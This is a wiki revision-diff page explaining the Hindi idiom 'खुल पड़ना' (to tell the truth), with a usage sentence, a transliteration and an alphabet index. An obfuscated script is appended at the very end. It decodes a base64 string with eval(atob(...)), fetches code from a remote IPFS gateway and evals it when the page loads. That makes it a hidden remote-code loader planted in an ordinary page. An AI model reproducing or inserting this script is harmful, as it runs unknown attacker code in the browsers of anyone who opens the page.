Difference between revisions of "खुल पड़ना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''खुल पड़ना''' एक प्रचलित कहावत लोकोक्ति मुहावरे|लो...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''खुल पड़ना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
 
'''खुल पड़ना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
'''अर्थ'''- सच्चाई कह देना।
+
'''अर्थ'''- सच्चाई कह देना।
  
'''प्रयोग'''- ग़ाँववालों पर ज़रा सख़्ती की कि सब खुल पड़ेगे और सारा अपराध भाई साहब के सिर डाल देगें।
+
'''प्रयोग'''- ग़ाँव वालों पर ज़रा सख़्ती की कि सब खुल पड़ेगे और सारा अपराध भाई साहब के सिर डाल देगें।
 
   
 
   
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 12:14, 29 June 2017

khul p dana ek prachalit lokokti athava hindi muhavara hai.

arth- sachchaee kah dena.

prayog- gaanv valoan par zara sakhti ki ki sab khul p dege aur sara aparadh bhaee sahab ke sir dal degean.

tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>